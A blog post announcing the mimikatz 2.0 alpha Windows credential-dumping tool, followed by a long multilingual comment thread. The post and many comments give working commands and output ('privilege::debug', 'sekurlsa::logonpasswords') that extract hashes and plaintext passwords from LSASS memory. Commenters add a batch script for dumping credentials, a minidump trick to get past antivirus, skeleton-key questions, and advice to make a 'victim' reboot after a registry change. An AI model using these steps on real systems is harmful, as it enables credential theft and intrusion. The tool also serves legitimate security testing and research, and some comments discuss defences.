添加链接
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接

mimikatz 2.0 vient de sortir en version alpha

  • binaires : https://github.com/gentilkiwi/mimikatz/releases/latest
  • sources : https://github.com/gentilkiwi/mimikatz
  • présentations : http://blog.gentilkiwi.com/presentations
  • Pour les pressés cherchant des mots de passe…

    A exécuter en administrateur :

    mimikatz # privilege::debug
    Privilege '20' OK
    mimikatz # sekurlsa::logonpasswords
    Authentication Id : 0 ; 515764 (00000000:0007deb4)
    Session           : Interactive from 2
    User Name         : Gentil Kiwi
    Domain            : vm-w7-ult-x
    SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
            msv :
             [00000003] Primary
             * Username : Gentil Kiwi
             * Domain   : vm-w7-ult-x
             * LM       : d0e9aee149655a6075e4540af1f22d3b
             * NTLM     : cc36cf7a8514893efccd332446158b1a
             * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
            tspkg :
             * Username : Gentil Kiwi
             * Domain   : vm-w7-ult-x
             * Password : waza1234/
    		

    Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar

    Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows

    Hints are as follows:
    Demande d’ACTIVATION du privilege: SeDebugPriviliege:OK
    Erreur:Impossible d’injecter !; 拒绝访问
    Erreur:pas ou plus de communication etablie

    How so? thank

    win7 sp1 administrator run it

    mimikatz # privilege::debug
    Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 580
    Erreur : Impossible d’injecter ! ; (0x00000005) 拒绝访问。

    mimikatz # @getLogonPasswords
    Erreur : pas ou plus de communication établie

    secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
    Remove Administrators/System
    This is also how you stop Pass-The-hash from working too.
    I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 640
    Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
    Same wtih Win7(64-bit) only the hex is different
    Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

    Répondre

    Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
    Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
    -william

    Répondre

    Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
    -mandingo-

    Répondre

    In some way yes. But Windows does not need it for Kerberos or NTLM auth. Just for some Digest auth.
    FireFox can use Kerberos and NTLM auth with SSO (see network.negotiate-auth.*), maybe wdigest too ?
    In all case, no need for hack for that, Windows allow « normal » API to obtain responses to challenges.

    Répondre
    C:\Program Files\WinRAR\ts\Win32>mimikatz.exe
    mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
    // http://blog.gentilkiwi.com/mimikatz
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 452
    Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足,无法处理此命令。
    mimikatz #

    help me

    Répondre

    FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
    -mandingo-

    Répondre

    Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily

    Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS

    LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
    mais il y a trop de méthodes TT,chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
    Bon courage et je vous souhaite une très bonne année 2012 .

    Répondre

    Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

    Répondre

    No problem with ASLR ;) It must be unicode or incorect unicode string for computer account, but appear to be valid in unicode… :( (try chcp before ;))
    Why did you use psexec for get system ? you can use privilege::debug

    Répondre

    Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

    mimikatz # @getLogonPasswords
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    mimikatz # @getLogonPasswords
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    Répondre

    So funny :), maybe you can try @getLogonPasswords full for « full » informations.
    Is your NTLM(RSA_PIN) same as msv1_0 NTLM hash ?

    I’m @PHDays, unfortunately I cannot test it now :)

    Répondre

    Ping : Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo) | Thangletoan’s Weblog

    Ping : 神器mimikatz | 冰锋刺客

    Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Startend.Blog's

    Ping : 神器mimikatz | 潇湘博客

    Ping : mimikatz - 网站安全,服务器安全,防御检测

    Ping : Password Cracking « Aggressive Virus Defense

    Ping : Windows 8 Clear Text Passwords from Locked Desktop with Mimikatz « CYBER ARMS – Computer Security

    Ping : Saber la pass del ADMIN « 3lhacker – Comunidad Informatica

    Bonjour,

    Pour info, mimikatz ne fonctionne pas sous windows 2003 enterprise (english) en version pré-servicepack.
    “The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. La version de la dll est 5.2.3790.

    Cela fonctionne bien une fois le SP2 installé (SP1 non testé).

    Un grand merci pour l’outil!

    Répondre

    C’est « hélas » inhérent au compilateur, et non à mimikatz

    http://msdn.microsoft.com/en-us/library/ms235435%28v=vs.100%29.aspx (cf. commentaires)

    Répondre

    Ping : Jak na export privatniho klice certifikatu, kdyz je oznacen jako non-exportable | logon

    Ping : 直接爆WIN2003+服务器的管理员密码的Mimikatz软件 | 紫云残雪's Blog

    Ping : Hacking Windows with Password Grabbing | ColeSec Security

    Ping : Obtener contraseña de administrador de Windows desde el propio Windows | DURKH3IM'S BLOG

    Ping : mimikatz-en (English Translation of Mimikatz) Release « AttackVector.org

    Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀Win系 – 思安阁

    Can you attack remote PC’s with this or you have to be on the actual clients machine to run this? You would also need to have admin rights I’m assuming.

    Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

    Keep up the good work.

    Répondre

    Ping : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz | Yoann's Workshop

    Ping : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1 | clymb3r

    Ping : [Sécurité] Mimikatz | aurelienantonoff

  • http://blog.gentilkiwi.com/securite/mimikatz/meterpreter
  • http://www.room362.com/blog/2012/9/6/completely-in-memory-mimikatz-with-metasploit.html
  • https://community.rapid7.com/community/metasploit/blog/2013/05/02/weekly-update
  • https://twitter.com/JosephBialek/status/331124336293462017
  • Répondre

    What commandline format in new alpha version ?

    mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

    in batch mode is crash

    Répondre

    Yeah : http://fr.slideshare.net/gentilkiwi/mimikatz-asfws/37

    Essentially: no admin, no physical access, no NTLM
    (effective, but an utopia for majority)

    Répondre

    Ping : PTSec – Portal de Segurança Português » [Tutorial] Passwords do Windows XP, 7, 8 em plaintext

    Ping : Mimikatz & WCE & Metasploit

    Will I be able to export a Certificate along with it’s private key even if the key isn’t exportable and import the Certificate to another computer?

    Thanks.

    Répondre

    Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

    Is there a way to do this?

    Thanks.

    Hi mate, awesome tool. any chance it will be able to dump domain user hashes (usually from ActiveDirectory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it would be great man!

    keep it up!

    Répondre

    Ping : Recovering Plain Text Passwords with Metasploit and Mimikatz | CYBER ARMS - Computer Security

    Ping : Cannot export certificate with private key? | Frederick Dicaire

    mimikatz # sekurlsa::logonPasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0) ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list mimikatz #
    Répondre

    Hey =)
    it is posible to use mimikatz with a Ram Dump?
    If not, this would be a nice feature.

    Greets from Germany
    Chris

    Répondre

    Thanks, but i only have complete images in RAW Format. Do you know any way to extract passwords out of that?
    and could you PLEASE PLEASE PLEASE write your error messages in english =( ?

    MANY THANKS TO YOU to Programm the WinDbg extension!!! i saw a post yesterday on twitter with a comment to with extension, today i checked it out. It is VERY NICE! a had a little Fight with the wow64exts in WinDbg but finally it Worked! Many thanks an greets from Germany!
    Greets Chris

    Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 « Alex Ionescu’s Blog

    Ping : TEKNOLOJİ : Bellekten Parolaların Elde Edilmesi – 2 | YÜKSEK STRATEJİ

    Ce qui est utilisé pour la dérivation reste le SHA1 du mot de passe.
    Tu peux le vérifier via FMyPrimitiveSHA , GetBCryptProviderHandle(0x8004u, 0, 0) et TranslateALGIDtoBCrypt .

    En plus de DPAPick que tu connais déjà bien ;) Il y a quelques infos ici : http://www.passcape.com/windows_password_recovery_dpapi_master_key

    Répondre

    (sorry I write in English, mon français n’est pas très bon)

    I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
    However, clear password dump is not available anymore.

    Is because of a new protection (or a better handle) of Windows 8.1?

    I have found no information regarding the new countermeasures in Windows 8.1.

    Do you have any information about this regards?

    And congrats for the great and so useful tool!

    Répondre

    Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

    When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

    If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
    It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
    In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

    Répondre

    As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
    Like in NT5 with Kerberos provider, some passwords fields are populated after unlocking.

    You can check this with : sekurlsa::searchpasswords .
    It searches the whole process for credentials, and it’s provider / offset independent.

    Répondre

    I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
    Thank you for the tool,

    mimikatz # crypto::stores
    Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0x00010000)

    Répondre

    Has something changed with the new version?

    It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

    Merci pour ton feedback!

    Output example (I replaced some info with XXXXXXXXXX)

    User Name         : XXXXXXXXXX
    Domain            : NT Service
    SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
            msv :
             [00000003] Primary
             * Username : XXXXXXXXXX
             * Domain   : UK
             * LM       : 00000000000000000000000000000000
             * NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
             * SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
            tspkg :
             * Username : XXXXXXXXXX
             * Domain   : UK
             * Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
    1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
    38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
     a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
    a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
    1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
     c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
    6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
    c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
     d2 62 6c d6 ec 35 b6
    Répondre

    Hi Michel,

    Services passwords, computers passwords, and some others are not necessary « human readable ». Nobody type them ! so in some cases Windows generates random « binary » passwords !

    In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary passwords =)

    const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6};
    SHA_CTX shactxInput;
    SHA_DIGEST shaInput;
    A_SHAInit(&shactxInput);
    A_SHAUpdate(&shactxInput, pwd, sizeof(pwd));
    A_SHAFinal(&shactxInput, &shaInput);
    kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1);

    Output is : 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50 , your SHA1 ;)
    mimikatz credentials output routine try to detect if the password is a printable string, if not, it display it in hex.

    Répondre

    Hello again!

    Thanks so much for the quick reply! This still leaves me with a couple of questions though:
    1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
    2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
    3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

    Thanks again for the feedback!

    Cordialement, Michel

    Répondre

    Mes excuses! J’ai vu que je peux encore retrouver le mot de passe avec la nouvelle version MK :) Vous pouvez supprimer mes deux commentaires si vous voulez.

    Merci de nouveau et bàt, Michel.

    Répondre

    Yep, depuis Avril 2012… heureusement le code source est disponible ;)
    Pour Symantec, ce que j’avais adoré à l’époque :
    « The tool allows an attacker to perform the following actions on the computer:

  • Cheat at minesweeper. »
  • I love Mimikatz it is a great tool.

    I like to procdump memory and then use the minidump function to process the dump off the client so even if Mimikatz is picked up by AV and cant be run locally it will still work! ;-)

    But I sometimes get a « MAJOR VERSION » error.

    Is this because I am using the wrong version of Mimikatz?

    Or does it mean that I am trying to work with a version of windows such as XP which doesnt natively have the Tkspg, Wdigest or Kerberos TGT functionality and it is the version of Windows that is wrong?

    Répondre

    Ping : Logging on as Domain Admin to end user workstations? Think again! | Tailspintoys – 365lab.net

    Ping : Exporting the not exportable – on the topic of Windows crypto key storage | Notes on open source and random ramblings

    Ping : procdump与mimikatz绕过杀毒软件读取密码 | Ends

    Ping : 神器mimikatz发布2.0_安全工具-十堰网络安全研究中心

    Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE26 INSIDE

    Ping : Backdoor в Active Directory - Mimikatz Golden Ticket | Levinkv's Blog - Информационная БезопасностьLevinkv's Blog – Информационная Безопасность

    Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? - Hedgehog Security

    Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? | GeekTime

    Ping : Windows Logon Password – Get Windows Logon Password using Wdigest in Memory Dump | Forensic Focus - Articles

    Ping : 三菱東京UFJに蔑まれているMacでBizSTATIONを使う | 高橋文樹.com

    Ping : Meterpreter Kiwi Extension: Golden Ticket HOWTO | Strategic Cyber LLC

    Ping : Anonyme

    Ping : Retrive windows password in cleartext | Technical guides by Gsec.se

    Ping : Mimikatz: A nasty little piece of awesomeness | Deep InfoSec

    Ping : 神器mimikatz 2.0 - 中国X黑客小组

    Bonjour,

    Je ne sais pas si tu as vu ça:
    http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B359?format=flash#fbid=

    @40′: µsoft using mimikatz :)

    Répondre

    Yeah, I did not write about it on the blog, but on Twitter yes ;)

  • https://twitter.com/gentilkiwi/status/466366820677865472
  • https://twitter.com/gentilkiwi/status/467976576081338368
  • Ping : PowerShell Magazine » Owning Networks and Evading Incident Response with PowerShell

    Ping : 密码抓取神器mimikatz2.0发布 | 七行者博客

    Ping : Sacar las contraseñas de Windows con mimikatz. | SmythSys IT Consulting

    save this file as anyname.bat and run as administrator with CMD.
    @echo off
    For /f « tokens=2-4 delims=/  » %%a in (‘date /t’) do (set mydate=%%c-%%a-%%b)
    For /f « tokens=1-2 delims=/: » %%a in (‘time /t’) do (set mytime=%%a%%b)
    mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

    Répondre

    Ping : The Evolution of Protected Processes – Part 1: Pass-the-Hash Mitigations in Windows 8.1 | My Website

    Ping : Cached Domain Credentials in Vista/7 (AKA Why Full Drive Encryption is Important) - Hedgehog Security

    Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! – WordPress

    Ping : Recopilación de herramientas de seguridad informática | Seguridad Informatica

    Ping : Lista com ferramentas de segurança e pentest | Mundo Tecnológico

    Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! | WordPress

    Ping : Decrypt / Recover Windows 8 Pin Code and Picture Password Instantly - eBrahma

    Ping : Pass-the-Golden-Ticket with Cobalt Strike’s Beacon | Strategic Cyber LLC

    Ping : 神器mimikatz,从lsass里抓密码 | 龍's Blog

    Hello, seems great, but how can i make it FUD ?
    do you have a nice crypter to do it ?
    because for the moment, Windows delete it instantly :(
    (avast i assume)

    thanks :)

    Répondre

    Ping : 直接从 lsass.exe 里获取windows处于active状态账号明文密码 | 天下英雄出我辈,一入江湖岁月催。 鸿图霸业谈笑间,不胜人生一场醉。 提剑跨骑挥鬼雨,白骨如山鸟惊飞

    Ping : Anonyme

    Hello guys!
    First of all, this crypto tool is simply fantastic!!!!

    I have a simple question:
    Is there any way to export the private key which is inside a eToken or smartcard? I tried the tool, but even with the capi and cng patches it didn’t work.

    Is there anything that can be done to export a private key inside an eToken?

    Thanks
    Répondre

    Responding to my own post, after further reading it looks like even if you are using a software based smartcard crypto provider, part of the key is stored in the trusted platform module chip soldered to your motherboard which is considered secure (it’s been hacked through extreme processes and measures over a period of months and is not a practical exploit).

    Someone please correct me if I am wrong!

    Bonjour

    Je créé un minidump via le taskmanager et voici ce que j’obtiens aprés sur la même machine …. Merci de m’éclairer ;-)

      .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Oct 31 2014 13:30:06)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'    Microsoft BlueHat edition!       with 14 modules * * */
    mimikatz # sekurlsa::minidump c:\temp\lsass.dmp
    Switch to MINIDUMP : 'c:\temp\lsass.dmp'
    mimikatz # sekurlsa::logonPasswords full
    Opening : 'c:\temp\lsass.dmp' file for minidump...
    ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0)
    Répondre

    C’est pourtant marqué : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump
    Tu veux utiliser le minidump avec une version de mimikatz différente de celle de l’architecture d’origine.
    (tu as fait ton dump sous un Windows x64, utilise mimikatz x64)

    Répondre

    Ping : Owning Networks and Evading Incident Response with PowerShell » Active Directory Security

    Ping : MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege » Active Directory Security

    Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 » Active Directory Security

    Ping : Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) » Active Directory Security

    Ping : День взлома публичных терминалов. | Бредоблог

    Ping : 抓取windows密码的神器mimikatz | linux爱好者

    Ping : 12 Days of HaXmas: MS14-068, now in Metasploit! | IT Security News

    When i attempt to load the CNG service on Windows 8.1, i get a nice error.

    ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

    I’ve got no AV running, or anything. Any ideas?

    Répondre

    Running into the same error in Server 2012 (not R2). I have local admin rights, disabled UAC, and disabled the UAC registry key, and have restarted a few times. Any help would be appreciated. Thank you!

    mimikatz # crypto::cng
    ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

    8.1/2012r2 with latest patch work.
    8.0/2012 too after one fix in mimikatz ( https://github.com/gentilkiwi/mimikatz/releases )

    Don’t forget that not all keys are CNG protected, keys can be CAPI protected too.
    Otherwise, you can open an issue on GitHub with output/log.

    Ping : [Из песочницы] Восстанавливаем локальные и доменные пароли из hiberfil.sys | Malanris's site

    Ping : Локальные и доменные пароли из hiberfil.sys | Азбука АйТи

    Ping : Mimikatz Aracı İle RAM Üzerinden Parolanın Açık Halinin Elde Edilmesi | SİBER GÜVENLİK PORTALİ

    Hi there!

    I’m trying get sekurlsa::logonPasswords on 2012 R2 machine with latest patches, but password field is null.
    binaries from https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150122

    any ideas?

    Répondre

    Ping : Windows kerberos ticket theft and exploitation on other platforms | mikkolehtisalo

    Ping : Blackhat USA 2015 | CyberSmashup

    Ping : Crack Windows 7 Password - DIARY INC

    Ping : Hash传递攻击Windows2012远程桌面 - BlackCyber Team

    Ping : Hash传递攻击Windows2012远程桌面 – cnccxv技术团队

    Ping : Hash传递攻击Windows2012远程桌面 - 内网渗透 - 秀尔实验室

    Ping : Windows 10 Security: Virtual Secure Mode | DevAdmin Blog

    Ping : Directory Services Internals » Dumping ntds.dit files using PowerShell

    Ping : Mimikatz – Multi-tool to play with Windows security | SecTechno

    Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE 26 INSIDE

    Ping : Test : Microsoft Advanced Threat Analytics | JdlS

    Ping : 提取系统明文密码 工具

    Ping : Mimikatz ile Bellekten Salt Şifre Elde Etme - Anıl Mamak

    Hi,there
    i used misc::skeleton to use skeleton key on dc
    but i want change the password « mimikatz » to my own password
    how to change it ?

    Répondre

    There are multiple aproaches, all of them having one thing in common. Since I don’t know you and your intentions (who knows, maybe it’s not your device, maybe it is. I can’t tell.) I’ll only give basic advice and a lead, the rest is up to you.
    Keep in mind that it has been a year or two since the last time I helped someone regaining acces. So there are some variables i’m not up-to-date with.

    First you should do some research on how windows works, only the basic things are required: How do the user accounts work, are they stored locally? (most likely, but I recall w10 being able to use your user account on multiple devices, I dont know w10’s behaviour when you have no internet connection and use the credentials you use for other devices too (ms account or something? ) > I expect that the user accounts and passwords are stored locally in both cases. > ask and find out how win manages passwords. (if correct, it should be possible to find out services etc used for this purpose.)

    Now: first go into a search engine you find handy and effective. Research the above mentioned things.
    Write down some keywords and the names of services / programs you suspect of being involved.

    second: Be creative > imagine a door with a lock thats externally mounted, screws exposed.. You have with you: A set of internals including a new key and a ratchet with 2 attatchments, one thats fitted is torx and one that you found out to be usable on the screws that hold the lock in place.
    >> What would you do to gain acces?

    Swap something over using a commonly availlable piece of gear so you can replace or remove that what keeps you from getting in.

    Good luck.

    ps. I usually can’t stand people who ask prior to doing research…
    You want something and don’t know how? Start learning then. All you need is availlable on the internet to read. If you don’t know why a certain method works, you don’t know what you are doing. You don’t know what you are doing, you will ‘hurt’ yourself eventually.

    Also, keep things nice and don’t use the underlying method in a way that gets you in trouble. Be whise, its your own responsibillity.

    Répondre

    incredible , also he obtained the password of other equipment that had connected to my local network
    you are a god of programming !!!

    Répondre

    Bonjour, je suis du type totalement ignare, mais c’est s’il n’y a aucun .exe dans les fichiers que l’on télécharge ?
    On est que deux à se poser la question, mais je trouve qu’elle mérite d’être posée…
    Au fait bravo, c’est enfin un français qui code des programmes qui servent vraiment ^^. Bonne continuation

    Répondre

    Ping : Useful Hacking with Paula Januszkiewicz Part 2 - Center for Professional Development @ ITT TechCenter for Professional Development @ ITT Tech

    Ping : Ferramentas para testes de invasão disponíveis no GitHub » Intrometendo

    Ping : Are you W10 experienced ? – Geekeries à MlM

    Thanks for the tool used it recently for windows 7 worked perfectly, but it doesn’t seem to work anymore on windows 10
    it says (null) instead

    Répondre

    Indeed, but all is not lost. If you have the possibility, change a registry key and lead your victim to reboot their machine…
    http://www.attactics.org/2015/09/windows-10-extracting-hashes-plaintext.html

    Répondre

    I accidentaly deleted one certificate from my certificate store. I’ve private key, which stored in folder AppData\Roaming\Microsoft\Crypto\RSA\. I’ve exported « public » part of certificate with .cer ending.

    If I import certificate into mmc, private key is not found. Do you think, that is possible to « extract » private key just from file, which is stored in AppData\Roaming\Microsoft\Crypto\RSA\? Thank you for answer.

    Répondre

    Sir my av (avast) is detecting it any deleting it immediately and I want to run while av is still there in system(windows 7)
    Pls help its my little project

    Thank u for tool works fine without av

    Répondre

    Hello,
    I wonder how many years of experience with c++ do you have ? I would like to know
    Thank you,
    Wiliam

    Répondre

    Hello,

    first: Thanks for sharing!
    But I’ve a problem. If I use the command « sekurlsa::logonpasswords » i get the Username etc.. but no password.
    « tspk: » is empty.
    « wdigest » Passwort shows me: « (null) »

    What did I wrong? Runned the exe as admin and no Virus-Programms or that^^

    Répondre

    please add a tool for removable drive (usb and others ) in misc and override administrator security :-)
    then nice work for the tools

    Répondre

    Awesome job! it helped me a lot through a remote session in a machine thet needed a restart & the owner did’nt gave me the admin password, so i was in the machine in an administrator session, i’ve runed the proper commands & worked like a charm.

    Now i’m tryng to experiment through non admin sessions, in my own machine, & a can’t figure it out. This is the console result:

    C:\Windows\System32>cd /MIMIKATZ/mimikatz_trunk/x64

    C:\MIMIKATZ\mimikatz_trunk\x64>mimikatz.exe

    .#####. mimikatz 2.1.1 (x64) built on Jul 20 2017 01:37:08
    .## ^ ##. « A La Vie, A L’Amour »
    ## / \ ## /* * *
    ## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
    ‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
    ‘#####’ with 21 modules * * */

    mimikatz # privilege::debug
    ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

    mimikatz #

    As you see, running cmd as admin, in a guest account, results in this error. What i’m doing wrong?

    Thx a lot in advance.

    Répondre

    emmmmmmmm…………

    somehow this tool was misused by somebody to launch the BadRabbit(NotPetya) Ransomware attack……..

    so this tool was also blacklisted by some antivirus company………….

    Répondre

    Salut,
    au debut j’ai eu le même problème. J’ai téléchargé le zip comme décrit, mais je ne pouvais pas trouver mimikatz.exe. Plus tard, j’ai découvert que mon programme anti-virus a secrètement supprimé mimikatz.exe, alors j’ai désactivé le programme anti-virus et voilà: mimikatz.exe
    Ma réponse est un peu en retard, mais peut-être il y a quelqu’un qui cherche encore une solution ;)
    Excusez mon francais, ce sont plusieurs années depuis ma dernière lecon de francais ;)

    Répondre

    Hello,
    I couldn’t able to export certificates with non-exportable private keys in WINDOWS XP.

    Details:
    .#####. mimikatz 2.1.1 (x86) built on Dec 20 2017 00:17:44
    .## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
    ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
    ## \ / ## > http://blog.gentilkiwi.com/mimikatz
    ‘## v ##’ Vincent LE TOUX ( [email protected] )
    ‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

    mimikatz # privilege::debug
    Privilege ’20’ OK

